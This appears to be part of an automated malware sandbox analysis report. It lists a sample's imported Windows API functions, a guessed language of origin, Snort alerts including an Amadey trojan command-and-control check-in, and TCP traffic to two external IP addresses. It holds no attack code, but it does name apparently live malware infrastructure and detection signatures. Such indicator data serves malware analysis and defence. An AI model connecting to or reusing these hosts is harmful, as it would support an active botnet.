GetStartupInfoW, InterlockedIncrement, GetModuleHandleW, UnhandledExceptionFilter, IsDebuggerPresent, WriteFile, GetStdHandle, IsBadReadPtr, TlsAlloc, GetCurrentThreadId, TlsFree, SetHandleCount, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, GetEnvironmentStringsW, HeapCreate, GetACP, GetOEMCP, GetCPInfo, IsValidCodePage, WriteConsoleW, OutputDebugStringW, RtlUnwind, MultiByteToWideChar, HeapAlloc, HeapReAlloc, HeapQueryInformation, HeapFree, WideCharToMultiByte, LCMapStringW, GetStringTypeW, IsProcessorFeaturePresent, FlushFileBuffers, ReadFile, RaiseException, CreateFileW

Possible Origin

Language of compilation system	Country where language is spoken	Map
Spanish	Colombia
Divehi; Dhivehi; Maldivian	Maldives

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
12/01/21-09:15:27.939009	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:27.939036	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:27.939441	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:27.939458	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:27.939875	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:27.940108	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:27.940662	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:27.940860	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:27.942494	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:27.944501	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:27.944626	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:27.944832	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:27.947079	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:27.947826	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:27.949751	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:27.950441	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:27.952975	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:27.952999	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:27.955087	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:27.959324	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:27.959364	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:27.963602	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:27.964001	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:27.964072	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:27.965997	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:27.966884	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:27.967654	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:27.967915	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:27.970287	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:27.973048	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:27.973490	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:27.973603	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:27.973648	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:27.974255	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:27.975888	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:27.976324	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:27.938333	TCP	2027700	ET TROJAN Amadey CnC Check-In	49835	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.017228	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.017357	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.018286	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.019055	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.020556	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.022874	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.025765	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.027190	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.031030	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.033978	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.035708	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.042916	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.046242	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.049292	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.050112	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.051019	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.053931	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.058639	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.061129	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.064584	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.065445	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.066977	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.068433	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.134916	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.138989	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.141726	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.142391	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.143009	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.143070	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.143182	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.143461	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.145481	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.146280	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.147789	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.147916	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.148044	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.149779	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.150140	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.150298	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.150522	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.153331	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.154210	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.156530	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.156545	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.158568	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.159440	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.160579	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.162738	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.163394	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.163834	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.206930	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.215706	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.218116	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.219546	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.223052	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.231899	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.234553	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.239499	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.248922	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.372219	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.374754	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.375537	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.377765	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.379787	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.380489	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.381615	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.382527	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.383883	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.394784	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.395252	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.398801	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.402673	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.404912	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.405663	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.407445	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.407460	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.407994	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.411762	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.439352	TCP	100000122	COMMUNITY WEB-MISC mod_jrun overflow attempt	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.464821	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.465462	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.467554	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.467832	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.469228	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.469912	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.470309	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.471480	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.472389	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.473762	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.474200	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.478022	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.478081	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.478783	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.479197	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.480086	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.480835	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.486962	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.488334	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.493028	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.493263	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.579528	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.580016	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.580057	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.580111	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.580574	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.582318	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.582604	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.582619	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.582902	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.584358	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.585166	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.585438	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.585556	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.586001	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.590867	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.594124	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.594133	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.594342	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.596731	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.600072	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.618370	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.641513	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.643203	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.651792	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.660490	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.662041	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.662645	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.663005	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.663175	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.663906	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.701458	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.701827	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.702723	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.703395	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.704151	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.704241	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.705690	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.705865	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.707339	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.708021	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.708596	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.708895	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.710438	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.711383	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.715417	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.716333	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.719065	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.721106	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35
12/01/21-09:15:28.724709	TCP	1087	WEB-MISC whisker tab splice attack	49836	80	192.168.2.4	185.215.113.35

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 1, 2021 09:13:55.263231993 CET	49757	80	192.168.2.4	95.213.165.249
Dec 1, 2021 09:13:55.320353031 CET	80	49757	95.213.165.249	192.168.2.4
Dec 1, 2021 09:13:55.320452929 CET	49757	80	192.168.2.4	95.213.165.249
Dec 1, 2021 09:13:55.320594072 CET	49757	80	192.168.2.4	95.213.165.249
Dec 1, 2021 09:13:55.320620060 CET	49757	80	192.168.2.4	95.213.165.249
Dec 1, 2021 09:13:55.377640963 CET	80	49757	95.213.165.249	192.168.2.4
Dec 1, 2021 09:13:55.425843000 CET	80	49757	95.213.165.249	192.168.2.4
Dec 1, 2021 09:13:55.425996065 CET	49757	80	192.168.2.4	95.213.165.249
Dec 1, 2021 09:13:55.427608967 CET	49757	80	192.168.2.4	95.213.165.249
Dec 1, 2021 09:13:55.461867094 CET	49758	80	192.168.2.4	95.213.165.249
Dec 1, 2021 09:13:55.484668970 CET	80	49757	95.213.165.249	192.168.2.4
Dec 1, 2021 09:13:55.519853115 CET	80	49758	95.213.165.249	192.168.2.4
Dec 1, 2021 09:13:55.519958019 CET	49758	80	192.168.2.4	95.213.165.249
Dec 1, 2021 09:13:55.520081043 CET	49758	80	192.168.2.4	95.213.165.249
Dec 1, 2021 09:13:55.520102024 CET	49758	80	192.168.2.4	95.213.165.249
Dec 1, 2021 09:13:55.577781916 CET	80	49758	95.213.165.249	192.168.2.4
Dec 1, 2021 09:13:55.621822119 CET	80	49758	95.213.165.249	192.168.2.4
Dec 1, 2021 09:13:55.621895075 CET	49758	80	192.168.2.4	95.213.165.249
Dec 1, 2021 09:13:55.621932983 CET	49758	80	192.168.2.4	95.213.165.249
Dec 1, 2021 09:13:55.679599047 CET	80	49758	95.213.165.249	192.168.2.4
Dec 1, 2021 09:13:55.970334053 CET	49759	80	192.168.2.4	95.213.165.249
Dec 1, 2021 09:13:56.027813911 CET	80	49759	95.213.165.249	192.168.2.4
Dec 1, 2021 09:13:56.028634071 CET	49759	80	192.168.2.4	95.213.165.249
Dec 1, 2021 09:13:56.028903961 CET	49759	80	192.168.2.4	95.213.165.249
Dec 1, 2021 09:13:56.028923988 CET	49759	80	192.168.2.4	95.213.165.249
Dec 1, 2021 09:13:56.086366892 CET	80	49759	95.213.165.249	192.168.2.4
Dec 1, 2021 09:13:56.128304005 CET	80	49759	95.213.165.249	192.168.2.4
Dec 1, 2021 09:13:56.128401995 CET	49759	80	192.168.2.4	95.213.165.249
Dec 1, 2021 09:13:56.129484892 CET	49759	80	192.168.2.4	95.213.165.249
Dec 1, 2021 09:13:56.158487082 CET	49760	80	192.168.2.4	95.213.165.249
Dec 1, 2021 09:13:56.186886072 CET	80	49759	95.213.165.249	192.168.2.4
Dec 1, 2021 09:13:56.216181993 CET	80	49760	95.213.165.249	192.168.2.4
Dec 1, 2021 09:13:56.216320992 CET	49760	80	192.168.2.4	95.213.165.249
Dec 1, 2021 09:13:56.216691017 CET	49760	80	192.168.2.4	95.213.165.249
Dec 1, 2021 09:13:56.216733932 CET	49760	80	192.168.2.4	95.213.165.249
Dec 1, 2021 09:13:56.274220943 CET	80	49760	95.213.165.249	192.168.2.4
Dec 1, 2021 09:13:56.318475008 CET	80	49760	95.213.165.249	192.168.2.4
Dec 1, 2021 09:13:56.318701029 CET	49760	80	192.168.2.4	95.213.165.249
Dec 1, 2021 09:13:56.318763971 CET	49760	80	192.168.2.4	95.213.165.249
Dec 1, 2021 09:13:56.376368999 CET	80	49760	95.213.165.249	192.168.2.4
Dec 1, 2021 09:13:56.617095947 CET	49761	80	192.168.2.4	95.213.165.249
Dec 1, 2021 09:13:56.674649000 CET	80	49761	95.213.165.249	192.168.2.4
Dec 1, 2021 09:13:56.674829960 CET	49761	80	192.168.2.4	95.213.165.249
Dec 1, 2021 09:13:56.674941063 CET	49761	80	192.168.2.4	95.213.165.249
Dec 1, 2021 09:13:56.674959898 CET	49761	80	192.168.2.4	95.213.165.249
Dec 1, 2021 09:13:56.733436108 CET	80	49761	95.213.165.249	192.168.2.4
Dec 1, 2021 09:13:56.778233051 CET	80	49761	95.213.165.249	192.168.2.4
Dec 1, 2021 09:13:56.778408051 CET	49761	80	192.168.2.4	95.213.165.249
Dec 1, 2021 09:13:56.778429031 CET	49761	80	192.168.2.4	95.213.165.249
Dec 1, 2021 09:13:56.826224089 CET	49762	80	192.168.2.4	95.213.165.249
Dec 1, 2021 09:13:56.835941076 CET	80	49761	95.213.165.249	192.168.2.4
Dec 1, 2021 09:13:56.884181976 CET	80	49762	95.213.165.249	192.168.2.4
Dec 1, 2021 09:13:56.884473085 CET	49762	80	192.168.2.4	95.213.165.249
Dec 1, 2021 09:13:56.884566069 CET	49762	80	192.168.2.4	95.213.165.249
Dec 1, 2021 09:13:56.884594917 CET	49762	80	192.168.2.4	95.213.165.249
Dec 1, 2021 09:13:56.942187071 CET	80	49762	95.213.165.249	192.168.2.4
Dec 1, 2021 09:13:56.989212036 CET	80	49762	95.213.165.249	192.168.2.4
Dec 1, 2021 09:13:56.989350080 CET	49762	80	192.168.2.4	95.213.165.249
Dec 1, 2021 09:13:56.989723921 CET	49762	80	192.168.2.4	95.213.165.249
Dec 1, 2021 09:13:57.047193050 CET	80	49762	95.213.165.249	192.168.2.4
Dec 1, 2021 09:13:57.317518950 CET	49763	80	192.168.2.4	95.213.165.249
Dec 1, 2021 09:13:57.375052929 CET	80	49763	95.213.165.249	192.168.2.4
Dec 1, 2021 09:13:57.375924110 CET	49763	80	192.168.2.4	95.213.165.249
Dec 1, 2021 09:13:57.375977039 CET	49763	80	192.168.2.4	95.213.165.249
Dec 1, 2021 09:13:57.461333036 CET	80	49763	95.213.165.249	192.168.2.4
Dec 1, 2021 09:13:57.461384058 CET	80	49763	95.213.165.249	192.168.2.4
Dec 1, 2021 09:13:57.461405993 CET	80	49763	95.213.165.249	192.168.2.4
Dec 1, 2021 09:13:57.461422920 CET	80	49763	95.213.165.249	192.168.2.4
Dec 1, 2021 09:13:57.461437941 CET	80	49763	95.213.165.249	192.168.2.4
Dec 1, 2021 09:13:57.461453915 CET	80	49763	95.213.165.249	192.168.2.4
Dec 1, 2021 09:13:57.461472988 CET	80	49763	95.213.165.249	192.168.2.4
Dec 1, 2021 09:13:57.461489916 CET	49763	80	192.168.2.4	95.213.165.249
Dec 1, 2021 09:13:57.461497068 CET	80	49763	95.213.165.249	192.168.2.4
Dec 1, 2021 09:13:57.461519003 CET	49763	80	192.168.2.4	95.213.165.249
